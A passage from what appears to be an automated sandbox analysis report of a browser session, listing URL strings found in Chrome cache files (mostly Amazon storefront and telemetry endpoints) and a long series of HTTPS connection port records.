    Source: sets.json.0.drString found in binary or memory: https://thirdspace.org.au
    Source: chromecache_1337.2.drString found in binary or memory: https://tiny.amazon.com/171he0ngb
    Source: chromecache_1380.2.dr, chromecache_798.2.dr, chromecache_1275.2.dr, chromecache_645.2.drString found in binary or memory: https://tiny.amazon.com/aok2pdnt/auiamazdevepopopopo
    Source: sets.json.0.drString found in binary or memory: https://top.pl
    Source: chromecache_1137.2.dr, chromecache_973.2.drString found in binary or memory: https://twitter.com
    Source: chromecache_603.2.drString found in binary or memory: https://twitter.com/intent/tweet
    Source: chromecache_943.2.dr, chromecache_1111.2.dr, chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://unagi-eu.amazon.com/1/events/com.amazon.csm.nexusclient.prod
    Source: chromecache_1207.2.drString found in binary or memory: https://unagi-eu.amazon.com/1/events/com.amazon.eel.SponsoredProductsEventTracking.prod?qualifier=17
    Source: chromecache_768.2.drString found in binary or memory: https://unagi-eu.amazon.com/1/events/com.amazon.eel.sbv.client.
    Source: chromecache_1207.2.drString found in binary or memory: https://unagi-eu.amazon.com/1/events/com.amazon.eel.sbv.client.prod.eu&#34;
    Source: chromecache_768.2.drString found in binary or memory: https://unagi-fe.amazon.com/1/events/com.amazon.eel.sbv.client.
    Source: chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://unagi-na.amazon.com
    Source: chromecache_943.2.dr, chromecache_1111.2.dr, chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://unagi-na.amazon.com/1/events/com.amazon.csm.nexusclient.gamma
    Source: chromecache_804.2.dr, chromecache_603.2.drString found in binary or memory: https://unagi-na.amazon.com/1/events/com.amazon.eel.BrandFollowButtonMetrics.Gamma.ClientEvents
    Source: chromecache_804.2.dr, chromecache_603.2.drString found in binary or memory: https://unagi-na.amazon.com/1/events/com.amazon.eel.BrandFollowButtonMetrics.Prod.ClientEvents
    Source: chromecache_768.2.drString found in binary or memory: https://unagi-na.amazon.com/1/events/com.amazon.eel.sbv.client.
    Source: chromecache_603.2.drString found in binary or memory: https://unagi-na.amazon.com/1/events/com.amazon.eel.sbv.client.prod.events
    Source: chromecache_943.2.dr, chromecache_1111.2.dr, chromecache_1207.2.dr, chromecache_1337.2.dr, chromecache_931.2.drString found in binary or memory: https://unagi.amazon.ae/1/events/com.amazon.csm.csa.prod
    Source: chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://unagi.amazon.cn
    Source: sets.json.0.drString found in binary or memory: https://welt.de
    Source: sets.json.0.drString found in binary or memory: https://wieistmeineip.de
    Source: sets.json.0.drString found in binary or memory: https://wordle.at
    Source: chromecache_943.2.dr, chromecache_1111.2.dr, chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://www.alexa.com/
    Source: chromecache_1111.2.drString found in binary or memory: https://www.amazon.ae/
    Source: chromecache_943.2.drString found in binary or memory: https://www.amazon.ae/All-Sports-Outdoors/b?ie=UTF8&amp;node=11601212031
    Source: chromecache_1111.2.drString found in binary or memory: https://www.amazon.ae/Amazon-Fashion/b/?ie=UTF8&amp;node=11497632031&quot;
    Source: chromecache_943.2.dr, chromecache_1111.2.dr, chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://www.amazon.ae/a/addresses?ref_=footer_yad
    Source: chromecache_1111.2.drString found in binary or memory: https://www.amazon.ae/adprefs
    Source: chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://www.amazon.ae/ap/register?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amaz
    Source: chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon
    Source: chromecache_943.2.dr, chromecache_1111.2.dr, chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://www.amazon.ae/gp/css/homepage.html?ref_=footer_ya
    Source: chromecache_943.2.dr, chromecache_1111.2.dr, chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://www.amazon.ae/gp/css/order-history?ref_=footer_yo
    Source: chromecache_1111.2.drString found in binary or memory: https://www.amazon.ae/l/15149952031
    Source: chromecache_1111.2.drString found in binary or memory: https://www.amazon.ae/l/15149952031?aaxitk=046dbf95c9ab1196e13ada14cb77d98d
    Source: chromecache_1111.2.drString found in binary or memory: https://www.amazon.ae/l/15149952031?aaxitk=ae89d2e78d762f4dd58aa74ddef69c6b
    Source: chromecache_943.2.dr, chromecache_1111.2.dr, chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://www.amazon.ae/your-product-safety-alerts?ref_=footer_bsx_ypsa
    Source: chromecache_943.2.dr, chromecache_1111.2.dr, chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://www.amazon.science
    Source: sets.json.0.drString found in binary or memory: https://www.asadcdn.com
    Source: chromecache_943.2.dr, chromecache_1111.2.dr, chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://www.audible.com/
    Source: chromecache_943.2.dr, chromecache_1111.2.dr, chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://www.goodreads.com/
    Source: chromecache_943.2.dr, chromecache_1111.2.dr, chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://www.imdb.com/
    Source: chromecache_804.2.dr, chromecache_603.2.drString found in binary or memory: https://www.pinterest.com/pin/create/button
    Source: chromecache_804.2.dr, chromecache_603.2.drString found in binary or memory: https://www.pinterest.com/pin/create/button/
    Source: chromecache_943.2.dr, chromecache_1111.2.dr, chromecache_1207.2.dr, chromecache_931.2.drString found in binary or memory: https://www.shopbop.com/welcome
    Source: sets.json.0.drString found in binary or memory: https://yours.co.uk
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 63405 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63646 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63921 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 63887 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 64616 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 64055 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64330 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64296 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64571 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64170 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 64101 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64468 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63498 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64182 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64628 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63520 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 64215 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 63658 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63933 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 64284 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 63818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64169 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64444 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64203 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63634 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64113 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 64067 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64342 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 63945 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63588 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63532 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63908 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63384 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63899 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63486 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64194 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63990 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 64366 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 63797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64481 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64398 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64157 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64432 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 64080 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 63691 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64260 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 64239 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64514 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 63989 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64546 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63576 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63442 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63507 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 63564 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64018 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 63602 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64133 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64079 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64354 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64419 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64493 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 60217 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 64558 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 63454 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 64023 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 63519 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64145 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64227 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64502 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64272 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63977 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 64309 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 64391 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64150 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64310 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63647
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64522 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63646
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63500 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63649
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63648
    Source: unknownNetwork traffic detected: HTTP traffic on port 63741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63437 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63641
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63640
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63643
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63642
    Source: unknownNetwork traffic detected: HTTP traffic on port 63953 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63645
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63644
    Source: unknownNetwork traffic detected: HTTP traffic on port 64510 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63695 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64264 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63626 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64591 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63658
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64505
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63657
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64504
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64507
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63659
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64506
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64509
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64508
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63650
    Source: unknownNetwork traffic detected: HTTP traffic on port 64087 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63652
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64288 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63651
    Source: unknownNetwork traffic detected: HTTP traffic on port 63392 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63654
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64501
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63653
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64500
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63656
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64503
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63655
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64502
    Source: unknownNetwork traffic detected: HTTP traffic on port 64509 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64534 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63512 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63670
    Source: unknownNetwork traffic detected: HTTP traffic on port 63449 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63965 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63669
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64516
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63668
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64515
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64518
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64517
    Source: unknownNetwork traffic detected: HTTP traffic on port 64011 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63494 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64519
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63661
    Source: unknownNetwork traffic detected: HTTP traffic on port 63879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63660
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63663
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64510
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63662
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63665
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64512
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63664
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64511
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63667
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64514
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63666
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64513
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 64149 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63681
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63680
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 64407 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64075 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60222 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64527
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63679
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64526
    Source: unknownNetwork traffic detected: HTTP traffic on port 63826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64529
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64528
    Source: unknownNetwork traffic detected: HTTP traffic on port 64276 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64378 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63568 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63672
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63671
    Source: unknownNetwork traffic detected: HTTP traffic on port 63614 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63674
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64521
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63673
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64520
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63676
    Source: unknownNetwork traffic detected: HTTP traffic on port 64322 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64523
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63675
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64522
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63678
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64525
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63677
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64524
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63430 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63671 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64125 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63556 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64240 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64578 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63603
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63602
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63605
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63604
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63607
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63606
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63609
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63608
    Source: unknownNetwork traffic detected: HTTP traffic on port 63880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63450 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64346 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63601
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63600
    Source: unknownNetwork traffic detected: HTTP traffic on port 63429 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64334 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64461 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63614
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63613
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63616
    Source: unknownNetwork traffic detected: HTTP traffic on port 64031 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63615
    Source: unknownNetwork traffic detected: HTTP traffic on port 64440 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63618
    Source: unknownNetwork traffic detected: HTTP traffic on port 64219 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63617
    Source: unknownNetwork traffic detected: HTTP traffic on port 64137 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63619
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63610
    Source: unknownNetwork traffic detected: HTTP traffic on port 63379 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63612
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63611
    Source: unknownNetwork traffic detected: HTTP traffic on port 63814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64043 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63474 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64099 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64207 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63625
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63624
    Source: unknownNetwork traffic detected: HTTP traffic on port 64604 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63627
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63626
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63629
